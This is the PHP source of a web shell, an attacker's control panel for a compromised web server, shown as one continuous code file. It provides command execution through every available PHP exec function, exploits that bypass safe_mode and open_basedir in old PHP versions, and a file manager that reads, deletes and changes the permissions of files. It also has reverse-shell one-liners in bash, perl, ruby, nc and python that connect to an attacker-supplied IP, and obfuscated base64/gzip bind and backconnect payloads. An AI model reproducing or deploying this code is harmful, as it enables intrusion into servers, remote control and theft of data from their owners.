'; $htaccesses=array('cgi' => "Options +Indexes +FollowSymLinks +ExecCGI\nAddType application/x-httpd-cgi .pl .py", 'ssi' => "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml\nAddOutputFilter INCLUDES .shtml"); if($_POST['action']!="") { $_SESSION['action']=$_POST['action']; $action=$_SESSION['action']; } else { $action="viewer"; } // download file or command execution result if($action=="download" or $_POST["down"]=="on") { $download="1"; } if ($download == "1") { if (isset($_POST["file"])) { header('Content-Length:'.filesize($_POST["file"]).''); } header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Accept-Ranges: bytes"); if (isset($_POST["filename"])) { header('Content-Disposition: attachment; filename="'.$_POST["filename"].'"'); } elseif (isset($_POST["file"])) { header('Content-Disposition: attachment; filename="'.$_POST["file"].'"'); } else { header('Content-Disposition: attachment; filename="result.txt"'); } } @set_magic_quotes_runtime(0); @ini_set("magic_quotes_runtime", 0); // slashes fix by r00nix if (get_magic_quotes_gpc()) { function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; } $_POST = array_map('stripslashes_deep', $_POST); $_GET = array_map('stripslashes_deep', $_GET); $_COOKIE = array_map('stripslashes_deep', $_COOKIE); $_REQUEST = array_map('stripslashes_deep', $_REQUEST); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $helpscript='function showTooltip(id) { var myDiv = document.getElementById(id); if(myDiv.style.display == "none"){ myDiv.style.display = "block"; } else { myDiv.style.display = "none"; } return false; }'; $resizescript='function changeSize(elem){ if(event.keyCode==13){ elem.rows = elem.rows+1; } var oldrows = getrows(elem); var myTxtAreaSize = elem.value.length; var newrows = (myTxtAreaSize / 80 | 0)+1; if(newrows>oldrows){ elem.rows = newrows; } else { elem.rows = oldrows; } } function getrows(elem){ var text = elem.value.replace(/\s+$/g, "\n"); var aNewlines = text.split("\n"); var iNewlineCount = aNewlines.length; return iNewlineCount; }'; $design='function cleard() { document.cookie="d=c; path=/;"; window.location.reload(); } function blackd() { document.cookie="d=b; path=/;"; window.location.reload(); }'; if ($_COOKIE['d'] != "c") { $style=''; } else { $style=''; } if ($_COOKIE['d'] == "c") { $button='

'; } else { $button='

'; } $title=' 12309 '.$ver.' '.$style.'
file operations || execute command || bind/backconnect || extras'.$button.''; // --------------------------------------------- symbolic permissions function fperms($file,$request) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = '?';} if ($request == "string") { $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } elseif ($request == "array") { $o["r"] = ($perms & 00400) > 0; $o["w"] = ($perms & 00200) > 0; $o["x"] = ($perms & 00100) > 0; $g["r"] = ($perms & 00040) > 0; $g["w"] = ($perms & 00020) > 0; $g["x"] = ($perms & 00010) > 0; $w["r"] = ($perms & 00004) > 0; $w["w"] = ($perms & 00002) > 0; $w["x"] = ($perms & 00001) > 0; return array("t"=>$info,"o"=>$o,"g"=>$g,"w"=>$w); } else { return "request?"; } } function view_perms_color($file) { if (!is_readable($file)) { return "".fperms($file,"string").""; } elseif (!is_writable($file)) { return "".fperms($file,"string").""; } else { return "".fperms($file,"string").""; } } // --------------------------------------------- touch file function touchz($file) { $form=TRUE; if (isset($_POST["touch_submit"])) { $date=explode(" ",$_POST["time"]); $day=explode("-",$date[0]); $time=explode(":",$date[1]); $unixtime=mktime($time[0],$time[1],$time[2],$day[1],$day[2],$day[0]); if (touch($file,$unixtime,$unixtime)) { $form = FALSE; echo "
touched ".$file." to ".$unixtime." (".$_POST["time"].") back

"; } else { echo "
can't touch to ".$unixtime." (".$_POST["time"].")! back

"; } } if ($form) { echo "
touch ".$file." to:
"; } return TRUE; } // --------------------------------------------- chmod code from c99 shell, updated by 12309 function chmodz($file) { $check = fileperms($file); if (!$check) {echo "chmod error: can`t get current value!";} else { $form=TRUE; if (isset($_POST["chmod_submit"])) { $chmod_o=$_POST["chmod_o"]; $chmod_g=$_POST["chmod_g"]; $chmod_w=$_POST["chmod_w"]; $octet=trim("0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8)); if (chmod($file,octdec($octet))) { $form = FALSE; echo "chmoded ".$file." to ".$octet."! back

"; } else { echo "can't chmod to ".$octet."! back

"; } } if (isset($_POST["chmod_string"])) { if (chmod($file,octdec($_POST["string"]))) { $form = FALSE; echo "chmoded ".$file." to ".$_POST["string"]."! back

"; } else { echo "can't chmod to ".$_POST["string"]."! back

"; } } if ($form) { $perms = fperms($file,"array"); echo "
chmoding ".$file.": ".view_perms_color($file)." (".substr(decoct($check),-4,4).") owned by:
".owner($file)."

input string:
"; echo "
or select checkboxes:
Owner
read
write
execute 		Group
read
write
execute 		World
read
write
execute
"; } } return TRUE; } // --------------------------------------------- clearing phpversion() function version() { $pv=explode(".",phpversion()); if(eregi("-",$pv[2])) { $tmp=explode("-",$pv[2]); $pv[2]=$tmp[0]; } $php_version_sort=$pv[0].".".$pv[1].".".$pv[2]; return $php_version_sort; } // --------------------------------------------- recursive dir removal by Endeveit function rmrf($dir) { if ($objs = glob($dir."/*")) { foreach($objs as $obj) { is_dir($obj) ? rmrf($obj) : unlink($obj); } } if (rmdir($dir)) { return TRUE; } else { return FALSE; } } // --------------------------------------------- checking for enabled funcs function function_enabled($func) { $disabled=explode(",",@ini_get("disable_functions")); if (empty($disabled)) { $disabled=array(); } else { $disabled=array_map('trim',array_map('strtolower',$disabled)); } return (function_exists($func) && is_callable($func) && !in_array($func,$disabled) ); } if (!function_enabled('shell_exec') and !function_enabled('proc_open') and !function_enabled('passthru') and !function_enabled('system') and !function_enabled('exec') and !function_enabled('popen')) { $failflag="1"; } else { $failflag="0"; } // -------------------------------------------- run command function run($c) { if (function_enabled('shell_exec')) { shell_exec($c); } else if(function_enabled('system')) { system($c); } else if(function_enabled('passthru')) { passthru($c); } else if(function_enabled('exec')) { exec($c); } else if(function_enabled('popen')) { $fp=popen($c,'r'); @pclose($fp); } else if(function_enabled('proc_open')) { $handle=proc_open($c,$GLOBALS["descriptorspec"],$pipes); while (!feof($pipes[1])) { $buffer.=fread($pipes[1],1024); } @proc_close($handle); } } // -------------------------------------------- php <= 5.2.9 curl bug function sploent529($path) { if (!is_dir('file:')) { mkdir('file:'); } $dirz=array(); $a=array(); $a=explode('/',$path); $c=count($a); $dir='file:/'; $d=substr($dir,0,-1); if (!is_dir($d)) { mkdir($d); } for ($i=0;$i<$c-1;++$i) { $dir.=$a[$i].'/'; $d=substr($dir,0,-1); $dirz[]=$d; if (!is_dir($d)) { mkdir($d); } } if (!file_exists($path)) { $fp=fopen('file:/'.$path,'w'); fclose($fp); } $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,'file:file:////'.$path); curl_setopt($ch,CURLOPT_HEADER,0); if(FALSE==curl_exec($ch)) { echo (" fail :( either there is no such file or exploit failed "); curl_close($ch); rmrf('file:'); echo $pageend; die(); } else { curl_close($ch); rmrf('file:'); return TRUE; } } // --------------------------------------------- php 5.1.6 ini_set bug function sploent516() { //safe_mode check if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { ini_restore("safe_mode"); if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { ini_set("safe_mode", FALSE); ini_set("safe_mode", "Off"); ini_set("safe_mode", "0"); if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { echo "safe mode: ON
"; } else { echo "safe mode: OFF || hello php-5.1.6 bugs
"; } } else { echo "safe mode: OFF || hello php-5.1.6 bugs
"; } } else { echo "safe mode: OFF
"; } //open_basedir check if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") { echo "open_basedir: none
"; } else { ini_restore("open_basedir"); if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") { echo "open_basedir: none || hello php-5.1.6 bugs
"; } else { ini_set('open_basedir', '/'); if (ini_get("open_basedir")=="/") { echo "open_basedir: / || hello php-5.1.6 bugs
"; } else { $basedir=TRUE; echo "open_basedir: ".ini_get("open_basedir"); } } } } // --------------------------------------------- findsock function findsock($path) { $VERSION = "1.0"; echo "findsock start\n "; $c="".$path." ".$_SERVER['REMOTE_ADDR']." ".$_SERVER['REMOTE_PORT'].""; run($c); echo " exiting\n"; exit(); } // --------------------------------------------- search for binary function search($bin,$flag) { if ($flag=="1") { $path=""; return $path; } else { if (function_enabled('shell_exec')) { $path=trim(shell_exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in')); } else if(function_enabled('exec')) { $path=trim(exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in')); } else if(function_enabled('system')) { ob_start(); system('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'); $path=trim(ob_get_contents()); ob_end_clean(); } else if (function_enabled('popen')) { $hndl=popen('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in', "r"); $path=trim(stream_get_contents($hndl)); pclose($hndl); } else if(function_enabled('passthru')) { ob_start(); passthru('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'); $path=trim(ob_get_contents()); ob_end_clean(); } else if(function_enabled('proc_open')) { $c='export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin && which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'; $process = proc_open('/bin/sh', $GLOBALS["descriptorspec"], $pipes); if (is_resource($process)) { fwrite($pipes[0],$c); fclose($pipes[0]); $path=trim(stream_get_contents($pipes[1])); fclose($pipes[1]); fclose($pipes[2]); @proc_close($process); } } } return $path; } // --------------------------------------------- filemanager code by Grinay, updated by 12309 function owner($path) { $user=fileowner($path); $group=filegroup($path); $data=$user; if(function_enabled('posix_getpwuid')) { $u=posix_getpwuid($user); $data.=" (".$u["name"].")"; } $data.="
".$group; if(function_enabled('posix_getgrgid')) { $g=posix_getgrgid($group); $data.=" (".$g["name"].") "; } return $data; } function view_size($size) { if ($size>=1073741824) { $size=@round($size/1073741824*100)/100 ." GB"; } elseif ($size>=1048576) { $size=$size." B
".@round($size/1048576*100)/100 ." MB"; } elseif ($size>=1024) { $size=$size." B
".@round($size/1024*100)/100 ." KB"; } else { $size=$size ." B"; } return $size; } function dirsize($path) { $totalsize=0; if ($handle=opendir($path)) { while (false !== ($file = readdir($handle))) { $nextpath=$path . '/' . $file; if ($file!='.' && $file != '..' && !is_link ($nextpath)) { if (is_dir($nextpath)) { $result=dirsize($nextpath); $totalsize+=$result['size']; } elseif (is_file($nextpath)) { $totalsize+=filesize($nextpath); } } } } closedir ($handle); return $totalsize; } function scandire($dir) { if (empty($dir)) { $dir=getcwd(); } $dir=chdir($dir) or die('cannot chdir! open_basedir/safe_mode on?

'.$pageend.''); $dir=getcwd()."/"; $dir=str_replace("\\","/",$dir); if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir.$file)=="dir") $dire[]=$file; if(filetype($dir.$file)=="file" || filetype($dir.$file)=="link" || filetype($dir.$file)=="socket") $files[]=$file; // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns "" // if(filetype($dir.$file)=="link") $files[]=$file; // echo "file = ".$file." (".filetype($file).")
"; #debug // if (is_link($file)) { echo " -> ".readlink($file); }; #debug } closedir($dh); @sort($dire); @sort($files); echo ""; echo ''; echo ""; for($i=0;$i'; } for($i=0;$i'; } echo "
go to dir:
NameTypeSizeInode Changed
File Modified
File Accessed		Owner
Group		ChmodAction
'.$dire[$i].'Dir'.view_size(dirsize($link)).''.date("d/m/Y H:i:s",filectime($link)).'
'.date("d/m/Y H:i:s",filemtime($link)).'
'.date("d/m/Y H:i:s",fileatime($link)).'		'.owner($link).''.substr(sprintf('%o',fileperms($link)), -4).'
('.view_perms_color($link,"string").')		x C T
'.$files[$i].''; echo '
File'.view_size(filesize($linkfile)).''.date("d/m/Y H:i:s",filectime($linkfile)).'
'.date("d/m/Y H:i:s",filemtime($linkfile)).'
'.date("d/m/Y H:i:s",fileatime($linkfile)).'		'.owner($linkfile).''.substr(sprintf('%o',fileperms($linkfile)), -4).'
('.view_perms_color($linkfile,"string").')		 D E x C T
"; } } } // --------------------------------------------- crypt functions by Eugen function entityenc($str) { $text_array=explode("\r\n", chunk_split($str, 1)); for ($n=0; $n < count($text_array) - 1; $n++) { $newstring .= "&#" . ord($text_array[$n]) . ";"; } return $newstring; } function entitydec($str) { $str=str_replace(';', '; ', $str); $text_array=explode(' ', $str); for ($n=0; $n < count($text_array) - 1; $n++) { $newstring .= chr(substr($text_array[$n], 2, 3)); } return $newstring; } function asc2hex($str) { return chunk_split(bin2hex($str), 2, " "); } function hex2asc($str) { $str=str_replace(" ", "", $str); for ($n=0; $n>6) & 0x3f}; ++$i; if ($i >= $count) break; if ($i < $count) $value |= (ord($input[$i]) << 16); $output .= $itoa64{($value>>12) & 0x3f}; ++$i; if ($i >= $count) break; $output .= $itoa64{($value>>18) & 0x3f}; } return $output; } function to64na($value,$num) { global $itoa64; $output = ''; while ($num-1 >= 0) { --$num; $output .= $itoa64{$value & 0x3f}; $value >>= 6; } return $output; } function unap($pwd,$salt,$magic='$1$') { if (substr($salt,0,strlen($magic)) == $magic) $salt = substr($salt,strlen($magic)); $salt = explode('$',$salt,1); $salt = substr($salt[0],0,8); $ctx = $pwd.$magic.$salt; $final = md5($pwd.$salt.$pwd,true); for ($pl=strlen($pwd);$pl>=0;$pl-=16) { $ctx .= substr($final,0,($pl>16?16:$pl)); } $i = strlen($pwd); while ($i) { $ctx .= ($i&1?chr(0):$pwd{0}); $i >>= 1; } $final = md5($ctx,true); for ($i=0;$i<1000;++$i) { $ctx1 = ''; $ctx1 .= ($i&1?$pwd:substr($final,0,16)); if ($i % 3) $ctx1 .= $salt; if ($i % 7) $ctx1 .= $pwd; $ctx1 .= ($i&1?substr($final,0,16):$pwd); $final = md5($ctx1,true); } $passwd = ''; $passwd .= to64na(((int)ord($final{0}) << 16)|((int)ord($final{6}) << 8)|((int)ord($final{12})),4); $passwd .= to64na(((int)ord($final{1}) << 16)|((int)ord($final{7}) << 8)|((int)ord($final{13})),4); $passwd .= to64na(((int)ord($final{2}) << 16)|((int)ord($final{8}) << 8)|((int)ord($final{14})),4); $passwd .= to64na(((int)ord($final{3}) << 16)|((int)ord($final{9}) << 8)|((int)ord($final{15})),4); $passwd .= to64na(((int)ord($final{4}) << 16)|((int)ord($final{10}) << 8)|((int)ord($final{5})),4); $passwd .= to64na(((int)ord($final{11})),2); return $magic.$salt.'$'.$passwd; } function phpass($pwd,$salt,$count,$prefix) { $hash = md5($salt.$pwd,true); for ($i=0;$i<$count;++$i) { $hash = md5($hash.$pwd,true); } return $prefix.substr($salt,0,8).to64as($hash,16); } function genSalt($salt,$length=8,$dot=0) { if (strlen($salt)>=$length) return substr($salt,0,$length); global $itoa64; if (!$dot) { $alphabet=substr($itoa64,2); } else { $alphabet=$itoa64; } $output=''; for ($i=0;$i<$length;++$i) $output.=$alphabet{mt_rand(0,strlen($alphabet)-1)}; return $output; } function mysql4($pwd) { $nr = 0x50305735; $nr2 = 0x12345671; $add = 7; $charArr = str_split($pwd); foreach ($charArr as $char) { if (in_array($char,array(' ','\n'))) continue; $charVal = ord($char); $nr ^= ((($nr & 63)+$add) * $charVal)+($nr << 8); $nr &= 0x7fffffff; $nr2 += ($nr2 << 8) ^ $nr; $nr2 &= 0x7fffffff; $add += $charVal; } return sprintf('%08x%08x',$nr,$nr2); } // --------------------------------------------- main code if (!isset($_REQUEST['p'])) { $_REQUEST['p']="s"; } switch ($_REQUEST['p']) { case "s": if (empty($_POST["wut"]) and $download != "1") { echo $title; sploent516(); if (ini_get("safe_mode")) { $failflag="1"; } $shelltext=("uname -a"); echo '
haxor@pwnedbox$ download

'; if ($failflag=="1") { echo "all system functions are disabled :( but you could try a CGI/SSI shell ;) and still there is
"; } else { if (function_enabled('passthru')) { echo 'passthru
'; } else { echo 'passthru is disabled!
';} if (function_enabled('system')) { echo 'system
'; } else { echo 'system is disabled!
';} if (function_enabled('exec')) { echo 'exec
'; } else { echo 'exec is disabled!
';} if (function_enabled('shell_exec')) { echo 'shell_exec
'; } else { echo 'shell_exec is disabled!
';} if (function_enabled('popen')) { echo 'popen
'; } else { echo 'popen is disabled!
';} if (function_enabled('proc_open')) { echo 'proc_open
'; } else { echo 'proc_open is disabled!
';} } // eval almost always enabled, except there is special option in suhosin-patched php echo 'php eval()
'; echo '
'; echo "
pcntl_exec:"; //determining if pcntl enabled is kinda tricky. debug: add if(dl('pcntl.so')) or check var_dump(get_extension_funcs('pcntl')) ? if (extension_loaded('pcntl')) { if (function_enabled('pcntl_fork')) { if (function_enabled('pcntl_exec')) { echo '
interpreter
haxor@pwnedbox$ > >> '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
delete result file after showing contents download
'; } else { echo "
pcntl_exec is disabled!
"; } } else { echo "
pcntl_fork is disabled!
"; } } else { echo "
fail, no pcntl.so here
"; } echo "
ssh2_exec:"; if (extension_loaded('ssh2')) { if (function_enabled('ssh2_connect')) { if (function_enabled('ssh2_exec')) { if ($download != "1") { if (empty($_POST["wut"])) { echo '
host: port: user: password:
haxor@pwnedbox$ download
'; } } } else { echo "
ssh2_exec is disabled!"; } } else { echo "
ssh2_connect is disabled!"; } } else { echo "
fail, no ssh2.so here"; } echo $pageend; } else { if ($download != "1") { echo $title; } $shelltext=$_POST["command"]; $html='
haxor@pwnedbox$ '; $input=' 2>&1 download
'; break; case "system": if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } echo "$html"; echo "$input"; echo 'system">'; break; case "exec": if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } echo "$html"; echo "$input"; echo 'exec">'; break; case "shell_exec": if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } echo "$html"; echo "$input"; echo 'shell_exec">'; break; case "popen": if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } echo "$html"; echo "$input"; echo 'popen">'; break; case "proc_open": if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } echo "$html"; echo "$input"; echo 'proc_open">'; break; case "eval": if (strnatcmp(version(),"5.2.9") <= 0) { sploent516(); } echo "$html"; echo 'php -r \''; echo ' \' '; break; case "pcntl": //sploent516 not needed coz pcntl bypasses safe_mode echo '
interpreter
haxor@pwnedbox$ > >> '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
delete result file after showing contents download
'; break; case "ssh2": echo '
host: port: user: password:
haxor@pwnedbox$ download
'; break; } } } if (!empty($_POST["wut"])) { if ($download != "1") { echo ""; } } break; // --------------------------------------------- shell end; file operations case "f": if ($download != "1") { echo $title; echo ""; echo "current dir: ".getcwd()."
"; sploent516(); echo "
--------------------------------
"; } if (empty($_POST["filer"]) and $download != "1" and empty($_POST["edt"]) and empty($_POST["sqlr"]) and empty($_POST["sqlu"]) and empty($_POST["upload"])) { echo ' >> read/upload/edit file <<

---> fail manager
'; } if ($action=="viewer") { if (!isset($dir)) { $dir=getcwd(); } scandire($_POST["dir"]); } if ($action=="download") { readfile($_POST["file"]); } if ($action=="chmod") { chmodz($_POST["file"]); } if ($action=="touch") { touchz($_POST["file"]); } if ($action == 'delete') { if (unlink($_POST["file"])) $content.="file ".$_POST["file"]." deleted, back"; } if ($action == 'deletedir') { if (!rmrf($_POST["file"])) { $content .="error deleting dir ".$_POST["file"].", back"; } else { $content .="dir ".$_POST["file"]." deleted, back"; } } if (!empty($content)) { echo $content; } if ($download != "1") { echo '
'; echo '
'; echo $pageend; } break; // --------------------------------------------- file operations end; bind case "b": echo $title; echo ' >> help <<

'; if ($failflag=="1") { echo "fail, at least one system function needed!

"; } else { $nc='(dont forget to setup nc first!)'; $semi='dont forget to write ; at the end of command!'; sploent516(); echo "
"; //debug: sometimes page cut here, when passthru system shell_exec are disabled echo ' - - - - = = = = > > one-liners
>> show code <<
'; echo '
backconnect to : using
'; $searchvar=trim(search("bash",$failflag)); if (empty($searchvar)) { echo "fail, no bash here (lolwut?)
"; } else { echo ' bash
'; } $searchvar=trim(search("perl",$failflag)); if (empty($searchvar)) { echo "fail, no perl here
"; } else { echo ' perl
'; } $searchvar=trim(search("ruby",$failflag)); if (empty($searchvar)) { echo "fail, no ruby here
"; } else { echo ' ruby
'; } $searchvar=trim(search("nc",$failflag)); if (empty($searchvar)) { echo "fail, no nc here
"; } else { echo ' nc
'; } $searchvar=trim(search("telnet",$failflag)); if (empty($searchvar)) { echo "fail, no telnet here
"; } else { echo ' telnet
'; } $searchvar=trim(search("python",$failflag)); if (empty($searchvar)) { echo "fail, no python here
"; } else { echo ' python
'; } echo '

'; if (!empty($_POST["oneline"])) { switch ($_POST["wut"]) { case "bash": $c='0<&123;exec 123<>/dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].'; sh <&123 >&123 2>&123'; run($c); echo "done
"; break; case "perl": $c='perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'.$_POST['ip'].':'.$_POST['port'].'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\''; run($c); echo "done
"; break; case "ruby": $c='ruby -rsocket -e \'exit if fork;c=TCPSocket.new("'.$_POST['ip'].'","'.$_POST['port'].'");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\''; run($c); echo "done
"; break; case "nc": $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && nc '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1'; run($c); echo "done
"; break; case "telnet": $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && telnet '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1'; run($c); echo "done
"; break; case "python": $c='python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$_POST['ip'].'",'.$_POST['port'].'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''; run($c); echo "done
"; break; } } echo '- - - - = = = = > > classic
'; echo '---> PHP
'; if (!function_enabled('set_time_limit')) { echo 'warning! set_time_limit off!
'; } if (!function_enabled('ignore_user_abort')) { echo 'warning! ignore_user_abort off!
'; } echo '
bind local port
'.$semi.'
'; if (function_enabled('fsockopen')) { if (function_enabled('proc_open')) { echo '
backconnect to :
'.$nc.'

'; } else { echo 'fail, proc_open is needed for backconnect!

'; } } else { echo 'fail, fsockopen is needed for backconnect!

'; } //php end echo '---> PERL
'; $searchvar=trim(search("perl",$failflag)); if (empty($searchvar)) { echo "fail, no perl here
"; } else { echo '
bind local port saving file to '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
'.$semi.'
'; echo '
backconnect to : saving file to
'.$nc.'
'; } //perl end echo "
"; echo '---> PYTHON
'; $searchvar=trim(search("python",$failflag)); if (empty($searchvar)) { echo "fail, no python here
"; } else { echo '
bind local port saving file to '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
'.$semi.'
'; echo '
backconnect to : saving file to
'.$nc.'
'; echo '
fully interactive backconnect to : saving file to
'; echo 'you need to run special client first: >> show code <<
with this one you will be able to run mc, top, vim, etc
'; } //python end echo "
"; echo '---> C
'; $searchvar=trim(search("gcc",$failflag)); if (empty($searchvar)) { echo "fail, no gcc here
"; } else { echo 'don\'t remove ".c" file extension! compiler= '.$searchvar.'
'; echo '
bind local port saving file to '; if (is_writable("./")) { echo "(./ writable)"; } else { echo "(./ readonly)"; } echo '
'.$semi.'
'; echo '
backconnect to : saving file to
'.$nc.'
'; } //c end echo "
"; echo '---> PHP+C findsock (likely wont work on modern php&apache >= 2009)
'; $searchvar=trim(search("gcc",$failflag)); if (empty($searchvar)) { echo "fail, no gcc here
"; } else { echo '
compile findsock saving binary to: >> help << '; echo '"; echo '


'; } } //failcheck end if (!empty($_POST["shellz"])) { //code by security-teams.net $perlbdcode='#!'.search("perl",$failflag).' use IO::Socket::INET; $server = IO::Socket::INET->new( LocalPort => '.$_POST["port"].','; $perlbdcode.=gzinflate(base64_decode('bY/RCoIwFIbve4rjiJhhSNemEGYQpYIadBFE6RFHpuKsiPDdc6ZB1C7G9n3/OdsBECt4FNgeQDfAd831wQ88a24rgzf18Mqx99OebhivMPtU2fOd6TrOW8qQlxAxpGR5ZClG0j4jsibcPWnudCyioMOQY3nDcmIcwxCLisqyyDzbJiymUpyX5w52FPKiedQPFitHASCzkehEtG/nbgMFiPHXWZ734/ijGeVCiXpimcqT7qtQt3uY5s30It7SevAC')); //code by Michael Schierl $perlbccode='#!'.search("perl",$failflag); $perlbccode.="\n"; $perlbccode.=gzinflate(base64_decode('lVVtb5pQFP7OrzgaUiChFZxNVxlmru06006MspdkWRqESyVFIHDRNq3/fedeXoTGdZkm5rw859znnPuAeUZgYg2Hi9h9INQQcvQ/uxENDUG0J9bF9cyeggnHfX1wpp+fn5/2y8RiZt9e3GBK184GWv/0tK9j5mp8PZ5MTZ3ZX6yFbYrj+fX3X9pv9GfWvPJ15mtmNyI0ow7topchAewWkW2Dz3A4mV7ZIAszQtKx56VgjoA3VnloFqeUh1hvDKUxjZkvUTeRVOFTiF2C6J6FNFVQIE7BCwiIHUPInrI4IRHIM/vrTxWknkc2vYSuHyUVrLv55Y/5i3U3taafbq2Lm1alSNeJKUmGEMQuDasG9bbQREC7IqEZzpZHieM+yFIglRjM5BHjaO4TmlI2bvYtlo1OAW81d1dekCJ/qRnkoy3sy8m0Gi3Kw7AFyddO9gCaIXjEDyLiyWISeMjSj9P2AeQxoBD4wPL/RiNQ7rCkAs9YSly528uWQdRz7gmlT3AcwXEIPRZZOtkK3r0faBqU2896bFVd3rBV/H+1VWkN/NDCwKjt9kcHWjSnN4QdlJ96s9Y3G1c7Gh1eboW6ms/fQIlJgitk94x2GkSmuGU/BH+YvjY4BAurfhCSKMaVJ4qqK2DqB3Ls+SmygOmMhMSlwKPY+8Xcx8rjmqFinCoo4gUH2Yp4Joojy5fsjrdO6nkOdfBO108gi34ar1WRxuy4j3eGsF0hDVlndy6mGwzi45USxyuRIC5z31fxXdEfoL5DJ+OKkju1mtKNAkdHuBUwTShfI0pDbSz/SmX8IBMfGHiGmjMfH9gBxq5khfu5p6uCAow4fk9ymwaUyDhJzbEJV0o9v00T+0Xkkankr3zriUvSrw7BLWc0lQsGmsqrTWAa2PFvMUhnPyafIfLjPGITF9eIveOcmlwVIG65veU24TZhNhYQdmJBrKBU9cHXvI6pxnUzyamFtPYz1CReQRlMZRo9CN0Jbhjjn0shv8Ku5FlwZSxPuH3CJzGEPw==')); //author/license unknown $cbdcode=gzinflate(base64_decode('bVBha8IwEP3eX3FMmOns1H2uDoo6kDEV7ZexSejaVA9rKkkUq+y/75q6Drd9CHl59y737jVQxtk+EdDTJsG8vX50Gj8UrmSU/eIK3THFTui/tM7jjTDXvBQG6XRQljxKA6TiidCeBXGGFVBxdWdCEhDqIBTfYeIBKUrgO9qofWzbN1GSKI7S6nj58OG/MrUKaSqBHb2NiGUlitSKBsbrSMEd4cPb0nXOYEXoO2muGPa7PvZKnY+tlgtnZyu2Whhm5bj0mu/HbtOjsWT5m3Rd3/m0VuNdUZHdpXdDAWgTmRuqXraHPlRpseCJjyej0IPFdPDMF+F8FLx4MJ7N5tNwysPBzKXlMAVWd/bh/sEFRxzRMEJU/jgJlTNWrePCbZ0LRYknkaesZkqH9aOtUfI02mJWkKGLkzLLK0EF7EWqtcllxsaTYDic82DySv99AQ==')); $cbdcode.='serv_addr.sin_port = htons('.$_POST["port"].');'; $cbdcode.="\n"; 